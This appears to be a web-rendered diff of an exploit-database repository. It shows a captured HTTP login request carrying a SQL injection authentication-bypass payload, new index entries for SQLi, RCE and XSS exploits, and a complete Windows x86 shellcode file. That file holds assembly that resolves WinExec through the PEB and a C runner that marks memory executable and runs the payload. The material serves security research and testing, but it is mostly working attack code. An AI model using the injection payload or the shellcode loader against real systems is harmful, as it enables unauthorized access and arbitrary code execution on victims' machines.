||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 83
|
||||||
|
Origin: http://localhost
|
||||||
|
Connection: close
|
||||||
|
Referer: http://localhost/dms/admin/
|
||||||
|
Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login
|
|
@ -44474,3 +44474,12 @@ id,file,description,date,author,type,platform,port
|
||||||
50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php,
|
50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php,
|
||||||
50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php,
|
50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php,
|
||||||
50359,exploits/multiple/webapps/50359.txt,"PlaceOS 1.2109.1 - Open Redirection",1970-01-01,"Hamza Khedr",webapps,multiple,
|
50359,exploits/multiple/webapps/50359.txt,"PlaceOS 1.2109.1 - Open Redirection",1970-01-01,"Hamza Khedr",webapps,multiple,
|
||||||
|
50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
|
||||||
|
50361,exploits/php/webapps/50361.txt,"Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping",1970-01-01,"Cristian \'void\' Giustini",webapps,php,
|
||||||
|
50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - SQL Injection / Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
|
||||||
|
50363,exploits/php/webapps/50363.txt,"Phpwcms 1.9.30 - File Upload to XSS",1970-01-01,"Okan Kurtulus",webapps,php,
|
||||||
|
50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
|
||||||
|
50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
|
||||||
|
50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple,
|
||||||
|
50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
|
||||||
|
50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
|
@ -1042,3 +1042,4 @@ id,file,description,date,author,type,platform
|
||||||
50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86
|
50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86
|
||||||
50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
|
50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
|
||||||
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
|
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
|
||||||
|
50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
|
||||||
|
|
|
187
shellcodes/windows_x86/50368.c
Normal file
187
shellcodes/windows_x86/50368.c
Normal file
|
@ -0,0 +1,187 @@
|
||||||
|
; Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
|
||||||
|
|
||||||
|
; Description:
|
||||||
|
|
||||||
|
; This is a shellcode that pop a calc.exe. The shellcode iuses
|
||||||
|
; the PEB method to locate the baseAddress of the required module and the Export Directory Table
|
||||||
|
; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required
|
||||||
|
; symbols without worry about the length. Finally the shellcode pop the calc.exe using WinExec
|
||||||
|
; and exits gracefully using TerminateProcess.
|
||||||
|
|
||||||
|
; Author: h4pp1n3ss
|
||||||
|
; Date: Wed 09/22/2021
|
||||||
|
; Tested on: Microsoft Windows [Version 10.0.19042.1237]
|
||||||
|
|
||||||
|
start:
|
||||||
|
|
||||||
|
mov ebp, esp ; prologue
|
||||||
|
add esp, 0xfffff9f0 ; Add space int ESP to avoid clobbering
|
||||||
|
|
||||||
|
|
||||||
|
find_kernel32:
|
||||||
|
xor ecx, ecx ; ECX = 0
|
||||||
|
mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
|
||||||
|
mov esi,[esi+0x0C] ; ESI = PEB->Ldr
|
||||||
|
mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
|
||||||
|
|
||||||
|
next_module:
|
||||||
|
mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
|
||||||
|
mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
|
||||||
|
mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
|
||||||
|
cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00 ?
|
||||||
|
jne next_module ; No: try next module
|
||||||
|
|
||||||
|
find_function_shorten:
|
||||||
|
jmp find_function_shorten_bnc ; Short jump
|
||||||
|
|
||||||
|
find_function_ret:
|
||||||
|
pop esi ; POP the return address from the stack
|
||||||
|
mov [ebp+0x04], esi ; Save find_function address for later usage
|
||||||
|
jmp resolve_symbols_kernel32 ;
|
||||||
|
|
||||||
|
find_function_shorten_bnc:
|
||||||
|
call find_function_ret ; Relative CALL with negative offset
|
||||||
|
|
||||||
|
find_function:
|
||||||
|
pushad ; Save all registers
|
||||||
|
|
||||||
|
mov eax, [ebx+0x3c] ; Offset to PE Signature
|
||||||
|
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
|
||||||
|
add edi, ebx ; Export Table Directory VMA
|
||||||
|
mov ecx, [edi+0x18] ; NumberOfNames
|
||||||
|
mov eax, [edi+0x20] ; AddressOfNames RVA
|
||||||
|
add eax, ebx ; AddressOfNames VMA
|
||||||
|
mov [ebp-4], eax ; Save AddressOfNames VMA for later
|
||||||
|
|
||||||
|
find_function_loop:
|
||||||
|
jecxz find_function_finished ; Jump to the end if ECX is 0
|
||||||
|
dec ecx ; Decrement our names counter
|
||||||
|
mov eax, [ebp-4] ; Restore AddressOfNames VMA
|
||||||
|
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
|
||||||
|
add esi, ebx ; Set ESI to the VMA of the current symbol name
|
||||||
|
|
||||||
|
compute_hash:
|
||||||
|
xor eax, eax ; NULL EAX
|
||||||
|
cdq ; NULL EDX
|
||||||
|
cld ; Clear direction
|
||||||
|
|
||||||
|
compute_hash_again:
|
||||||
|
lodsb ; Load the next byte from esi into al
|
||||||
|
test al, al ; Check for NULL terminator
|
||||||
|
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
|
||||||
|
ror edx, 0x0d ; Rotate edx 13 bits to the right
|
||||||
|
add edx, eax ; Add the new byte to the accumulator
|
||||||
|
jmp compute_hash_again ; Next iteration
|
||||||
|
|
||||||
|
compute_hash_finished:
|
||||||
|
|
||||||
|
find_function_compare:
|
||||||
|
cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
|
||||||
|
jnz find_function_loop ; If it doesn't match go back to find_function_loop
|
||||||
|
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
|
||||||
|
add edx, ebx ; AddressOfNameOrdinals VMA
|
||||||
|
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
|
||||||
|
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
|
||||||
|
add edx, ebx ; AddressOfFunctions VMA
|
||||||
|
mov eax, [edx+4*ecx] ; Get the function RVA
|
||||||
|
add eax, ebx ; Get the function VMA
|
||||||
|
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
|
||||||
|
|
||||||
|
find_function_finished:
|
||||||
|
popad ; Restore registers
|
||||||
|
ret ;
|
||||||
|
|
||||||
|
resolve_symbols_kernel32:
|
||||||
|
push 0xe8afe98 ; WinExec hash
|
||||||
|
call dword ptr [ebp+0x04] ; Call find_function
|
||||||
|
mov [ebp+0x10], eax ; Save WinExec address for later usage
|
||||||
|
push 0x78b5b983 ; TerminateProcess hash
|
||||||
|
call dword ptr [ebp+0x04] ; Call find_function
|
||||||
|
mov [ebp+0x14], eax ; Save TerminateProcess address for later usage
|
||||||
|
|
||||||
|
create_calc_string:
|
||||||
|
xor eax, eax ; EAX = null
|
||||||
|
push eax ; Push null-terminated string
|
||||||
|
push dword 0x6578652e ;
|
||||||
|
push dword 0x636c6163 ;
|
||||||
|
push esp ; ESP = &(lpCmdLine)
|
||||||
|
pop ebx ; EBX save pointer to string
|
||||||
|
|
||||||
|
; UINT WinExec(
|
||||||
|
; LPCSTR lpCmdLine, -> EBX
|
||||||
|
; UINT uCmdShow -> EAX
|
||||||
|
; );
|
||||||
|
|
||||||
|
call_winexec:
|
||||||
|
xor eax, eax ; EAX = null
|
||||||
|
push eax ; uCmdShow
|
||||||
|
push ebx ; lpCmdLine
|
||||||
|
call dword ptr [ebp+0x10] ; Call WinExec
|
||||||
|
|
||||||
|
; BOOL TerminateProcess(
|
||||||
|
; HANDLE hProcess, -> 0xffffffff
|
||||||
|
; UINT uExitCode -> EAX
|
||||||
|
; );
|
||||||
|
|
||||||
|
terminate_process:
|
||||||
|
xor eax, eax ; EAX = null
|
||||||
|
push eax ; uExitCode
|
||||||
|
push 0xffffffff ; hProcess
|
||||||
|
call dword ptr [ebp+0x14] ; Call TerminateProcess
|
||||||
|
|
||||||
|
|
||||||
|
[!]===================================== POC ========================================= [!]
|
||||||
|
|
||||||
|
/*
|
||||||
|
|
||||||
|
Shellcode runner author: reenz0h (twitter: @sektor7net)
|
||||||
|
|
||||||
|
*/
|
||||||
|
#include <windows.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
// Our WinExec PopCalc shellcode
|
||||||
|
|
||||||
|
unsigned char payload[] =
|
||||||
|
"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x5e\x08\x8b\x7e"
|
||||||
|
"\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43"
|
||||||
|
"\x3c\x8b\x7c\x03\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b\x45\xfc\x8b"
|
||||||
|
"\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75"
|
||||||
|
"\xdf\x8b\x57\x24\x01\xda\x66\x8b\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61"
|
||||||
|
"\xc3\x68\x98\xfe\x8a\x0e\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x14\x31\xc0"
|
||||||
|
"\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\x5b\x31\xc0\x50\x53\xff\x55\x10\x31\xc0\x50\x6a\xff"
|
||||||
|
"\xff\x55\x14";
|
||||||
|
|
||||||
|
|
||||||
|
unsigned int payload_len = 178;
|
||||||
|
|
||||||
|
int main(void) {
|
||||||
|
|
||||||
|
void * exec_mem;
|
||||||
|
BOOL rv;
|
||||||
|
HANDLE th;
|
||||||
|
DWORD oldprotect = 0;
|
||||||
|
|
||||||
|
// Allocate a memory buffer for payload
|
||||||
|
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
|
||||||
|
|
||||||
|
// Copy payload to new buffer
|
||||||
|
RtlMoveMemory(exec_mem, payload, payload_len);
|
||||||
|
|
||||||
|
// Make new buffer as executable
|
||||||
|
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
|
||||||
|
|
||||||
|
printf("\nHit me!\n");
|
||||||
|
printf("Shellcode Length: %d\n", strlen(payload));
|
||||||
|
getchar();
|
||||||
|
|
||||||
|
// If all good, run the payload
|
||||||
|
if ( rv != 0 ) {
|
||||||
|
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
|
||||||
|
WaitForSingleObject(th, -1);
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
Loading…
Add table
Reference in a new issue